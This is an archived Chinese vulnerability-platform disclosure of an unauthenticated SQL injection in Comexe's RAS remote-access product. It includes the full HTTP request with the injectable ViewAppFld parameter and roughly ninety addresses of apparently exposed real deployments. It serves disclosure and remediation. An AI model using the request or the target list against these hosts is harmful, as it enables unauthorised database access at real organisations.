当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124796

漏洞标题:科迈RAS远程快速接入方案另一处SQL注入(无需登录DBA权限)

相关厂商:深圳市科迈通讯技术有限公司

漏洞作者: YY-2012

提交时间:2015-07-08 11:54

修复时间:2015-10-08 16:18

公开时间:2015-10-08 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向第三方安全合作伙伴开放
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

89案例。

详细说明:

WooYun: 科迈某客户端两处SQL注入影响大量系统(无需登录DBA权限) 与这个注入文件不同。
科迈RAS远程快速接入方案(远程快速应用接入)全版本都受影响的。
无需登录存在SQL注入。

POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://183.230.42.251:81/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 183.230.42.251:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1


参数ViewAppFld

漏洞证明:

aaaaaaaaaaaaaaa11111111111111111.jpg


aaaaaaaaaaaaaaa22222222222222222222.jpg


aaaaaaaaaaaaaaa33333333333333333.jpg


aaaaaaaaaaaa44444444444444444.jpg


aaaaaaaaaaaa555555555555555555.jpg


http://220.172.105.41:81/CmxDownload.php
http://125.66.20.6/CmxDownload.php
http://183.230.42.251:81/CmxDownload.php
http://221.13.104.174:8888/CmxDownload.php
http://114.135.72.241:81/CmxDownload.php
http://61.189.189.43:81/CmxDownload.php
http://202.104.138.38/CmxDownload.php
http://222.242.198.90/CmxDownload.php
http://113.106.92.83:8080/cmxlogin.php?t=14345927739642
http://122.227.188.254/cmxlogin.php?t=14345719793756
http://60.191.119.162:8080/CmxDownload.php
http://oa.wishingfoods.com:8080/CmxDownload.php
http://61.164.136.94:81/CmxDownload.php
http://58.222.218.171:8888/CmxDownload.php
http://60.191.95.21:8080/CmxDownload.php
http://58.210.192.202:8888/cmxlogin.php?t=13547228176021
http://58.211.90.4:81/CmxDownload.php
http://222.34.131.4:81/CmxDownload.php
http://60.10.34.57:8888/CmxDownload.php
http://124.67.67.99:8080/CmxDownload.php
http://58.18.169.92/CmxDownload.php
http://218.21.213.182:8000/cmxlogin.php?t=14344257908105
http://116.113.105.106:8000/cmxlogin.php?t=14344255806630
http://61.134.119.52:8000/CmxDownload.php
http://116.113.111.29:8080/CmxDownload.php
http://202.99.241.40/CmxDownload.php
http://124.67.68.166:8000/CmxDownload.php
http://183.129.249.246:8002/CmxDownload.php
http://125.88.162.31:81/CmxDownload.php
http://58.210.33.231:8080/CmxDownload.php
http://61.163.182.87:8080/CmxDownload.php
http://60.191.26.174:81/cmxlogin.php?t=14343482319389
http://61.182.242.18:8080/CmxDownload.php
http://218.94.1.157:81/CmxDownload.php
http://27.223.11.34:8001/CmxDownload.php
http://218.21.213.182:8000/cmxlogin.php?t=14343020933433
http://223.72.237.39/CmxDownload.php
http://60.10.192.106:8080/CmxDownload.php
http://122.228.122.58/CmxDownload.php
http://116.113.105.106:8000/cmxlogin.php?t=14342616673483
http://122.224.109.230:8080/CmxDownload.php
http://122.224.231.67:81/CmxDownload.php
http://221.224.94.98/CmxDownload.php
http://113.16.255.224:8080/CmxDownload.php
http://222.185.234.100:8000/CmxDownload.php
http://222.168.51.166:8000/CmxDownload.php
http://222.222.156.19:81/cmxlogin.php?t=14342148006227
http://218.59.231.170:81/CmxDownload.php
http://121.33.210.52:8000/CmxDownload.php
http://mail.ydqx.cn/cmxlogin.php?t=14341807665134
http://222.46.21.186:8080/CmxDownload.php
http://ydqx.cn/cmxlogin.php?t=14341806064013
http://218.15.164.122/cmxlogin.php?t=14341805565006
http://58.246.192.162:8001/cmxlogin.php?t=14341775326147
http://61.164.94.186:8080/CmxDownload.php
http://221.12.36.150:8000/CmxDownload.php
http://erp.ap365.com:8088/CmxDownload.php
http://123.235.22.66:8080/CmxDownload.php
http://180.166.124.162:8080/CmxDownload.php
http://60.28.142.150:81/CmxDownload.php
http://116.228.68.38:8080/CmxDownload.php
http://180.166.136.3:81/CmxDownload.php
http://61.153.216.59:8080/CmxDownload.php
http://101.68.209.2:8080/cmxlogin.php?t=14339409675130
http://222.162.50.226:8080/CmxDownload.php
http://222.85.1.76:8000/CmxDownload.php
http://mail.zypcg.com/CmxDownload.php
http://60.208.78.51:8000/CmxDownload.php
http://116.113.111.29:8080/CmxDownload.php
http://218.25.170.4:8080/CmxDownload.php
http://122.226.152.126:8080/CmxDownload.php
http://218.65.37.93:8888/CmxDownload.php
http://115.238.142.206:8080/CmxDownload.php
http://58.211.149.138:81/CmxDownload.php
http://180.169.76.3:8080/cmxlogin.php?t=14338222676437
http://61.164.50.186:8080/CmxDownload.php
http://122.224.109.227:8080/CmxDownload.php
http://220.166.160.42/cmxlogin.php?t=14337336287380
http://221.8.32.20/CmxDownload.php
http://218.71.137.102/CmxDownload.php
http://218.26.238.82:8000/cmxlogin.php?t=14337068121870
http://61.154.11.185:8888/CmxDownload.php
http://122.140.95.39:8080/CmxDownload.php
http://223.255.20.80/CmxDownload.php
http://61.132.92.51:81/cmxlogin.php?t=14336851360738
http://125.32.43.190:8080/CmxDownload.php
http://122.224.204.250:8888/cmxlogin.php?t=14336609488901
http://111.43.129.102:8888/CmxDownload.php
http://219.159.111.190:8888/cmxlogin.php?t=14336562079134

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-07-10 16:17

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无